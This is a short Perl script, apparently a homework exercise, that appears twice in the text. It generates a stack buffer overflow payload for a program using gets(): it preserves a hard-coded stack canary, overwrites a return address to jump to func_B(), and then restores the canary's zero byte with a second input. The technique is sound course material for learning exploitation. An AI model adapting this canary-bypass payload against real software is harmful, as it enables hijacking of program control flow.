ramntry/hw1.2.pl

## hw1.2.pl
#!/usr/bin/env perl

print "a" x 32;            # fill some buffer gap
print "Z"."\x45\x8b\x6b";  # save the canary unchanged but use a temporary byte instead zero-byte to prolong c-string in memory
print "b" x 12;            # fill some another gap
print "\x5b\x85\x04\x08";  # override the func_A() return address from main() body to func_B() beginning
print "\xd3\x94\xe1\xf7";  # write the func_B() return address equal to main() one
print "\n";                # return from first gets() call and wait for another one
print "c" x 32;            # replace the temporary byte denoting zero-byte within canary with real zero
	#!/usr/bin/env perl

	print "a" x 32; # fill some buffer gap
	print "Z"."\x45\x8b\x6b"; # save the canary unchanged but use a temporary byte instead zero-byte to prolong c-string in memory
	print "b" x 12; # fill some another gap
	print "\x5b\x85\x04\x08"; # override the func_A() return address from main() body to func_B() beginning
	print "\xd3\x94\xe1\xf7"; # write the func_B() return address equal to main() one
	print "\n"; # return from first gets() call and wait for another one
	print "c" x 32; # replace the temporary byte denoting zero-byte within canary with real zero